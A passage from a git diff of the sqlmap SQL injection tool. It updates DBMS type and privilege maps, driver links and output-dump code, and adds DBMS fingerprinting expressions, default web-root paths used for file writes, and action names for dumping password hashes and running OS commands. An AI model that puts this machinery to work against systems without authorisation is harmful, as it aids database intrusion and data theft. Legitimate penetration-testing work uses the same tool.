+ 27: "DOUBLE", + 10: "FLOAT", + 16: "INT64", + 8: "INTEGER", + 9: "QUAD", + 7: "SMALLINT", + 12: "DATE", + 13: "TIME", + 35: "TIMESTAMP", + 37: "VARCHAR", +} + +INFORMIX_TYPES = { + 0: "CHAR", + 1: "SMALLINT", + 2: "INTEGER", + 3: "FLOAT", + 4: "SMALLFLOAT", + 5: "DECIMAL", + 6: "SERIAL", + 7: "DATE", + 8: "MONEY", + 9: "NULL", + 10: "DATETIME", + 11: "BYTE", + 12: "TEXT", + 13: "VARCHAR", + 14: "INTERVAL", + 15: "NCHAR", + 16: "NVARCHAR", + 17: "INT8", + 18: "SERIAL8", + 19: "SET", + 20: "MULTISET", + 21: "LIST", + 22: "ROW (unnamed)", + 23: "COLLECTION", + 40: "Variable-length opaque type", + 41: "Fixed-length opaque type", + 43: "LVARCHAR", + 45: "BOOLEAN", + 52: "BIGINT", + 53: "BIGSERIAL", + 2061: "IDSSECURITYLABEL", + 4118: "ROW (named)", +} SYBASE_TYPES = { - "14": "floatn", - "8": "float", - "15": "datetimn", - "12": "datetime", - "23": "real", - "28": "numericn", - "10": "numeric", - "27": "decimaln", - "26": "decimal", - "17": "moneyn", - "11": "money", - "21": "smallmoney", - "22": "smalldatetime", - "13": "intn", - "7": "int", - "6": "smallint", - "5": "tinyint", - "16": "bit", - "2": "varchar", - "18": "sysname", - "25": "nvarchar", - "1": "char", - "24": "nchar", - "4": "varbinary", - "80": "timestamp", - "3": "binary", - "19": "text", - "20": "image", - } + 14: "floatn", + 8: "float", + 15: "datetimn", + 12: "datetime", + 23: "real", + 28: "numericn", + 10: "numeric", + 27: "decimaln", + 26: "decimal", + 17: "moneyn", + 11: "money", + 21: "smallmoney", + 22: "smalldatetime", + 13: "intn", + 7: "int", + 6: "smallint", + 5: "tinyint", + 16: "bit", + 2: "varchar", + 18: "sysname", + 25: "nvarchar", + 1: "char", + 24: "nchar", + 4: "varbinary", + 80: "timestamp", + 3: "binary", + 19: "text", + 20: "image", +} + +ALTIBASE_TYPES = { + 1: "CHAR", + 12: "VARCHAR", + -8: "NCHAR", + -9: "NVARCHAR", + 2: "NUMERIC", + 6: "FLOAT", + 8: "DOUBLE", + 7: "REAL", + -5: "BIGINT", + 4: "INTEGER", + 5: "SMALLINT", + 9: "DATE", + 30: "BLOB", + 40: "CLOB", + 20001: "BYTE", + 20002: "NIBBLE", + -7: "BIT", + -100: "VARBIT", + 10003: "GEOMETRY", +} MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } + 1: "select_priv", + 2: "insert_priv", + 3: "update_priv", + 4: "delete_priv", + 5: "create_priv", + 6: "drop_priv", + 7: "reload_priv", + 8: "shutdown_priv", + 9: "process_priv", + 10: "file_priv", + 11: "grant_priv", + 12: "references_priv", + 13: "index_priv", + 14: "alter_priv", + 15: "show_db_priv", + 16: "super_priv", + 17: "create_tmp_table_priv", + 18: "lock_tables_priv", + 19: "execute_priv", + 20: "repl_slave_priv", + 21: "repl_client_priv", + 22: "create_view_priv", + 23: "show_view_priv", + 24: "create_routine_priv", + 25: "alter_routine_priv", + 26: "create_user_priv", +} PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } + 1: "createdb", + 2: "super", + 3: "replication", +} + +# Reference(s): http://stackoverflow.com/a/17672504 +# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCES", - "E": "EXECUTE", - } + "S": "SELECT", + "I": "INSERT", + "U": "UPDATE", + "D": "DELETE", + "R": "REFERENCE", + "X": "EXECUTE", + "A": "ALL", + "M": "MEMBER", + "T": "DECRYPT", + "E": "ENCRYPT", + "B": "SUBSCRIBE", +} + +# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm +# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm + +INFORMIX_PRIVS = { + "D": "DBA (all privileges)", + "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", + "C": "CONNECT (work with existing tables)", + "G": "ROLE", + "U": "DEFAULT (implicit connection)", +} DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } + 1: "CONTROLAUTH", + 2: "ALTERAUTH", + 3: "DELETEAUTH", + 4: "INDEXAUTH", + 5: "INSERTAUTH", + 6: "REFAUTH", + 7: "SELECTAUTH", + 8: "UPDATEAUTH", +} DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/"), - } + DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"), + DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"), + DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.ORACLE: (ORACLE_ALIASES, "python-oracledb", "https://oracle.github.io/python-oracledb/", "oracle"), + DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/3/library/sqlite3.html", "sqlite"), + DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"), + DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "https://kinterbasdb.sourceforge.net/", "firebird"), + DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), + DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), + DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.H2: (H2_ALIASES, None, None, None), + DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.MONETDB: (MONETDB_ALIASES, "pymonetdb", "https://github.com/gijzelaerr/pymonetdb", "monetdb"), + DBMS.DERBY: (DERBY_ALIASES, "pydrda", "https://github.com/nakagami/pydrda/", None), + DBMS.VERTICA: (VERTICA_ALIASES, "vertica-python", "https://github.com/vertica/vertica-python", "vertica+vertica_python"), + DBMS.MCKOI: (MCKOI_ALIASES, None, None, None), + DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None), + DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None), + DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None), + DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None), + DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None), + DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None), + DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None), + DBMS.RAIMA: (RAIMA_ALIASES, None, None, None), + DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None), + DBMS.SNOWFLAKE: (SNOWFLAKE_ALIASES, None, None, "snowflake"), +} +# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/ FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - } + DBMS.ORACLE: " FROM DUAL", + DBMS.ACCESS: " FROM MSysAccessObjects", + DBMS.FIREBIRD: " FROM RDB$DATABASE", + DBMS.MAXDB: " FROM DUAL", + DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", + DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS", + DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL", + DBMS.DERBY: " FROM SYSIBM.SYSDUMMY1", + DBMS.MIMERSQL: " FROM SYSTEM.ONEROW", + DBMS.FRONTBASE: " FROM INFORMATION_SCHEMA.IO_STATISTICS" +} + +HEURISTIC_NULL_EVAL = { + DBMS.ACCESS: "CVAR(NULL)", + DBMS.MAXDB: "ALPHA(NULL)", + DBMS.MSSQL: "PARSENAME(NULL,NULL)", + DBMS.MYSQL: "IFNULL(QUARTER(NULL),NULL XOR NULL)", # NOTE: previous form (i.e., QUARTER(NULL XOR NULL)) was bad as some optimization engines wrongly evaluate QUARTER(NULL XOR NULL) to 0 + DBMS.ORACLE: "INSTR2(NULL,NULL)", + DBMS.PGSQL: "QUOTE_IDENT(NULL)", + DBMS.SQLITE: "JULIANDAY(NULL)", + DBMS.H2: "STRINGTOUTF8(NULL)", + DBMS.MONETDB: "CODE(NULL)", + DBMS.DERBY: "NULLIF(USER,SESSION_USER)", + DBMS.VERTICA: "BITSTRING_TO_BINARY(NULL)", + DBMS.MCKOI: "TONUMBER(NULL)", + DBMS.PRESTO: "FROM_HEX(NULL)", + DBMS.ALTIBASE: "TDESENCRYPT(NULL,NULL)", + DBMS.MIMERSQL: "ASCII_CHAR(256)", + DBMS.CRATEDB: "MD5(NULL~NULL)", # NOTE: NULL~NULL also being evaluated on H2 and Ignite + DBMS.CUBRID: "(NULL SETEQ NULL)", + DBMS.CACHE: "%SQLUPPER NULL", + DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", + DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL)", + DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", + DBMS.CLICKHOUSE: "halfMD5(NULL)", + DBMS.SNOWFLAKE: "BOOLNOT(NULL)", +} SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), - - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), - - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), - - "SQL data control": ( - "grant ", - "revoke ", ), - - "SQL data execution": ( - "exec ", - "execute ", ), - - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", + ), + + "SQL data definition": ( + "create ", + "declare ", + "drop ", + "truncate ", + "alter ", + ), + + "SQL data manipulation": ( + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "copy ", + "load ", + ), + + "SQL data control": ( + "grant ", + "revoke ", + ), + + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", + ), + + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", + ), + + "SQL administration": ( + "set ", + ), +} POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - } + POST_HINT.JSON: "application/json", + POST_HINT.JSON_LIKE: "application/json", + POST_HINT.MULTIPART: "multipart/form-data", + POST_HINT.SOAP: "application/soap+xml", + POST_HINT.XML: "application/xml", + POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", +} + +OBSOLETE_OPTIONS = { + "--replicate": "use '--dump-format=SQLITE' instead", + "--no-unescape": "use '--no-escape' instead", + "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", + "--ignore-401": "use '--ignore-code' instead", + "--second-order": "use '--second-url' instead", + "--purge-output": "use '--purge' instead", + "--sqlmap-shell": "use '--shell' instead", + "--check-payload": None, + "--check-waf": None, + "--pickled-options": "use '--api -c ...' instead", + "--identify-waf": "functionality being done automatically", +} DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - } +} DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } + DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, + DBMS.MSSQL: { + "IMAGE": "CONVERT(VARBINARY(MAX),%s)", + "GEOMETRY": "(%s).STAsText()", + "GEOGRAPHY": "(%s).STAsText()" + }, + DBMS.PGSQL: { + "GEOMETRY": "ST_AsText(%s)", + "GEOGRAPHY": "ST_AsText(%s)" + }, + DBMS.MYSQL: { + "GEOMETRY": "ST_AsText(%s)" + } +} + +DEFAULT_DOC_ROOTS = { + OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), + OS.LINUX: ("/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs", "/usr/local/var/www", "/usr/share/nginx/html") +} + +PART_RUN_CONTENT_TYPES = { + "checkDbms": CONTENT_TYPE.TECHNIQUES, + "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, + "getBanner": CONTENT_TYPE.BANNER, + "getCurrentUser": CONTENT_TYPE.CURRENT_USER, + "getCurrentDb": CONTENT_TYPE.CURRENT_DB, + "getHostname": CONTENT_TYPE.HOSTNAME, + "isDba": CONTENT_TYPE.IS_DBA, + "getUsers": CONTENT_TYPE.USERS, + "getPasswordHashes": CONTENT_TYPE.PASSWORDS, + "getPrivileges": CONTENT_TYPE.PRIVILEGES, + "getRoles": CONTENT_TYPE.ROLES, + "getDbs": CONTENT_TYPE.DBS, + "getTables": CONTENT_TYPE.TABLES, + "getColumns": CONTENT_TYPE.COLUMNS, + "getSchema": CONTENT_TYPE.SCHEMA, + "getCount": CONTENT_TYPE.COUNT, + "dumpTable": CONTENT_TYPE.DUMP_TABLE, + "search": CONTENT_TYPE.SEARCH, + "sqlQuery": CONTENT_TYPE.SQL_QUERY, + "tableExists": CONTENT_TYPE.COMMON_TABLES, + "columnExists": CONTENT_TYPE.COMMON_COLUMNS, + "readFile": CONTENT_TYPE.FILE_READ, + "writeFile": CONTENT_TYPE.FILE_WRITE, + "osCmd": CONTENT_TYPE.OS_CMD, + "regRead": CONTENT_TYPE.REG_READ +} + +# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html + +HTML_ENTITIES = { + "quot": 34, + "amp": 38, + "apos": 39, + "lt": 60, + "gt": 62, + "nbsp": 160, + "iexcl": 161, + "cent": 162, + "pound": 163, + "curren": 164, + "yen": 165, + "brvbar": 166, + "sect": 167, + "uml": 168, + "copy": 169, + "ordf": 170, + "laquo": 171, + "not": 172, + "shy": 173, + "reg": 174, + "macr": 175, + "deg": 176, + "plusmn": 177, + "sup2": 178, + "sup3": 179, + "acute": 180, + "micro": 181, + "para": 182, + "middot": 183, + "cedil": 184, + "sup1": 185, + "ordm": 186, + "raquo": 187, + "frac14": 188, + "frac12": 189, + "frac34": 190, + "iquest": 191, + "Agrave": 192, + "Aacute": 193, + "Acirc": 194, + "Atilde": 195, + "Auml": 196, + "Aring": 197, + "AElig": 198, + "Ccedil": 199, + "Egrave": 200, + "Eacute": 201, + "Ecirc": 202, + "Euml": 203, + "Igrave": 204, + "Iacute": 205, + "Icirc": 206, + "Iuml": 207, + "ETH": 208, + "Ntilde": 209, + "Ograve": 210, + "Oacute": 211, + "Ocirc": 212, + "Otilde": 213, + "Ouml": 214, + "times": 215, + "Oslash": 216, + "Ugrave": 217, + "Uacute": 218, + "Ucirc": 219, + "Uuml": 220, + "Yacute": 221, + "THORN": 222, + "szlig": 223, + "agrave": 224, + "aacute": 225, + "acirc": 226, + "atilde": 227, + "auml": 228, + "aring": 229, + "aelig": 230, + "ccedil": 231, + "egrave": 232, + "eacute": 233, + "ecirc": 234, + "euml": 235, + "igrave": 236, + "iacute": 237, + "icirc": 238, + "iuml": 239, + "eth": 240, + "ntilde": 241, + "ograve": 242, + "oacute": 243, + "ocirc": 244, + "otilde": 245, + "ouml": 246, + "divide": 247, + "oslash": 248, + "ugrave": 249, + "uacute": 250, + "ucirc": 251, + "uuml": 252, + "yacute": 253, + "thorn": 254, + "yuml": 255, + "OElig": 338, + "oelig": 339, + "Scaron": 352, + "fnof": 402, + "scaron": 353, + "Yuml": 376, + "circ": 710, + "tilde": 732, + "Alpha": 913, + "Beta": 914, + "Gamma": 915, + "Delta": 916, + "Epsilon": 917, + "Zeta": 918, + "Eta": 919, + "Theta": 920, + "Iota": 921, + "Kappa": 922, + "Lambda": 923, + "Mu": 924, + "Nu": 925, + "Xi": 926, + "Omicron": 927, + "Pi": 928, + "Rho": 929, + "Sigma": 931, + "Tau": 932, + "Upsilon": 933, + "Phi": 934, + "Chi": 935, + "Psi": 936, + "Omega": 937, + "alpha": 945, + "beta": 946, + "gamma": 947, + "delta": 948, + "epsilon": 949, + "zeta": 950, + "eta": 951, + "theta": 952, + "iota": 953, + "kappa": 954, + "lambda": 955, + "mu": 956, + "nu": 957, + "xi": 958, + "omicron": 959, + "pi": 960, + "rho": 961, + "sigmaf": 962, + "sigma": 963, + "tau": 964, + "upsilon": 965, + "phi": 966, + "chi": 967, + "psi": 968, + "omega": 969, + "thetasym": 977, + "upsih": 978, + "piv": 982, + "bull": 8226, + "hellip": 8230, + "prime": 8242, + "Prime": 8243, + "oline": 8254, + "frasl": 8260, + "ensp": 8194, + "emsp": 8195, + "thinsp": 8201, + "zwnj": 8204, + "zwj": 8205, + "lrm": 8206, + "rlm": 8207, + "ndash": 8211, + "mdash": 8212, + "lsquo": 8216, + "rsquo": 8217, + "sbquo": 8218, + "ldquo": 8220, + "rdquo": 8221, + "bdquo": 8222, + "dagger": 8224, + "Dagger": 8225, + "permil": 8240, + "lsaquo": 8249, + "rsaquo": 8250, + "euro": 8364, + "weierp": 8472, + "image": 8465, + "real": 8476, + "trade": 8482, + "alefsym": 8501, + "larr": 8592, + "uarr": 8593, + "rarr": 8594, + "darr": 8595, + "harr": 8596, + "crarr": 8629, + "lArr": 8656, + "uArr": 8657, + "rArr": 8658, + "dArr": 8659, + "hArr": 8660, + "forall": 8704, + "part": 8706, + "exist": 8707, + "empty": 8709, + "nabla": 8711, + "isin": 8712, + "notin": 8713, + "ni": 8715, + "prod": 8719, + "sum": 8721, + "minus": 8722, + "lowast": 8727, + "radic": 8730, + "prop": 8733, + "infin": 8734, + "ang": 8736, + "and": 8743, + "or": 8744, + "cap": 8745, + "cup": 8746, + "int": 8747, + "there4": 8756, + "sim": 8764, + "cong": 8773, + "asymp": 8776, + "ne": 8800, + "equiv": 8801, + "le": 8804, + "ge": 8805, + "sub": 8834, + "sup": 8835, + "nsub": 8836, + "sube": 8838, + "supe": 8839, + "oplus": 8853, + "otimes": 8855, + "perp": 8869, + "sdot": 8901, + "lceil": 8968, + "rceil": 8969, + "lfloor": 8970, + "rfloor": 8971, + "lang": 9001, + "rang": 9002, + "loz": 9674, + "spades": 9824, + "clubs": 9827, + "hearts": 9829, + "diams": 9830 +} diff --git a/lib/core/dump.py b/lib/core/dump.py index f2e7c93182d..aa50ae07c4c 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,52 +1,69 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs +import hashlib import os +import re +import shutil +import tempfile import threading -from xml.dom.minidom import getDOMImplementation - from lib.core.common import Backend +from lib.core.common import checkFile from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout -from lib.core.common import getUnicode +from lib.core.common import filterNone +from lib.core.common import getSafeExString from lib.core.common import isListLike +from lib.core.common import isNoneValue from lib.core.common import normalizeUnicode from lib.core.common import openFile from lib.core.common import prioritySortColumns from lib.core.common import randomInt from lib.core.common import safeCSValue +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getConsoleLength +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.convert import htmlEscape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import API_CONTENT_STATUS -from lib.core.enums import API_CONTENT_TYPE +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import CONTENT_TYPE from lib.core.enums import DBMS from lib.core.enums import DUMP_FORMAT from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapValueException from lib.core.replication import Replication +from lib.core.settings import CHECK_SQLITE_TYPE_THRESHOLD +from lib.core.settings import DUMP_FILE_BUFFER_SIZE from lib.core.settings import HTML_DUMP_CSS_STYLE +from lib.core.settings import IS_WIN from lib.core.settings import METADB_SUFFIX from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT +from lib.core.settings import VERSION_STRING +from lib.core.settings import WINDOWS_RESERVED_NAMES +from lib.utils.safe2bin import safechardecode +from thirdparty import six from thirdparty.magic import magic -from extra.safe2bin.safe2bin import safechardecode - class Dump(object): """ This class defines methods used to parse and output the results of SQL injection actions - """ def __init__(self): @@ -55,79 +72,95 @@ def __init__(self): self._lock = threading.Lock() def _write(self, data, newline=True, console=True, content_type=None): - if hasattr(conf, "api"): - dataToStdout(data, content_type=content_type, status=API_CONTENT_STATUS.COMPLETE) - return - text = "%s%s" % (data, "\n" if newline else " ") - if console: + if conf.api: + dataToStdout(data, contentType=content_type, status=CONTENT_STATUS.COMPLETE) + + elif console: dataToStdout(text) - if kb.get("multiThreadMode"): - self._lock.acquire() + if self._outputFP: + multiThreadMode = kb.multiThreadMode + if multiThreadMode: + self._lock.acquire() - self._outputFP.write(text) + try: + self._outputFP.write(text) + except IOError as ex: + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) - if kb.get("multiThreadMode"): - self._lock.release() + if multiThreadMode: + self._lock.release() kb.dataOutputFlag = True + def flush(self): + if self._outputFP: + try: + self._outputFP.flush() + except IOError: + pass + def setOutputFile(self): - self._outputFile = "%s%slog" % (conf.outputPath, os.sep) + if conf.noLogging: + self._outputFP = None + return + + self._outputFile = os.path.join(conf.outputPath, "log") try: - self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING) - except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex + self._outputFP = openFile(self._outputFile, 'a' if not conf.flushSession else 'w') + except IOError as ex: + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) - def getOutputFile(self): - return self._outputFile - - def singleString(self, data): - self._write(data) + def singleString(self, data, content_type=None): + self._write(data, content_type=content_type) def string(self, header, data, content_type=None, sort=True): - kb.stickyLevel = None + if conf.api: + self._write(data, content_type=content_type) + + if isListLike(data) and len(data) == 1: + data = unArrayizeValue(data) if isListLike(data): - self.lister(header, data, sort) + self.lister(header, data, content_type, sort) elif data is not None: _ = getUnicode(data) - if _ and _[-1] == '\n': + if _.endswith("\r\n"): + _ = _[:-2] + + elif _.endswith("\n"): _ = _[:-1] - if hasattr(conf, "api"): - self._write(data, content_type=content_type) - elif "\n" in _: + if _.strip(' '): + _ = _.strip(' ') + + if "\n" in _: self._write("%s:\n---\n%s\n---" % (header, _)) else: - self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _)) - elif hasattr(conf, "api"): - self._write(data, content_type=content_type) - else: - self._write("%s:\tNone" % header) + self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, six.string_types) else _)) def lister(self, header, elements, content_type=None, sort=True): if elements and sort: try: elements = set(elements) elements = list(elements) - elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + elements.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) except: pass - if hasattr(conf, "api"): + if conf.api: self._write(elements, content_type=content_type) - return if elements: self._write("%s [%d]:" % (header, len(elements))) for element in elements: - if isinstance(element, basestring): + if isinstance(element, six.string_types): self._write("[*] %s" % element) elif isListLike(element): self._write("[*] " + ", ".join(getUnicode(e) for e in element)) @@ -136,45 +169,51 @@ def lister(self, header, elements, content_type=None, sort=True): self._write("") def banner(self, data): - self.string("banner", data, content_type=API_CONTENT_TYPE.BANNER) + self.string("banner", data, content_type=CONTENT_TYPE.BANNER) def currentUser(self, data): - self.string("current user", data, content_type=API_CONTENT_TYPE.CURRENT_USER) + self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER) def currentDb(self, data): - if Backend.isDbms(DBMS.MAXDB): - self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=API_CONTENT_TYPE.CURRENT_DB) - elif Backend.isDbms(DBMS.ORACLE): - self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=API_CONTENT_TYPE.CURRENT_DB) + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + self.string("current database (equivalent to schema on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO): + self.string("current database (equivalent to owner on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: - self.string("current database", data, content_type=API_CONTENT_TYPE.CURRENT_DB) + self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) def hostname(self, data): - self.string("hostname", data, content_type=API_CONTENT_TYPE.HOSTNAME) + self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME) def dba(self, data): - self.string("current user is DBA", data, content_type=API_CONTENT_TYPE.IS_DBA) + self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA) def users(self, users): - self.lister("database management system users", users, content_type=API_CONTENT_TYPE.USERS) + self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS) + + def statements(self, statements): + self.lister("SQL statements", statements, content_type=CONTENT_TYPE.STATEMENTS) def userSettings(self, header, userSettings, subHeader, content_type=None): self._areAdmins = set() - if userSettings: - self._write("%s:" % header) - if isinstance(userSettings, (tuple, list, set)): self._areAdmins = userSettings[1] userSettings = userSettings[0] - users = userSettings.keys() - users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + users = [_ for _ in userSettings.keys() if _ is not None] + users.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + + if conf.api: + self._write(userSettings, content_type=content_type) + + if userSettings: + self._write("%s:" % header) for user in users: - settings = userSettings[user] + settings = filterNone(userSettings[user]) - if 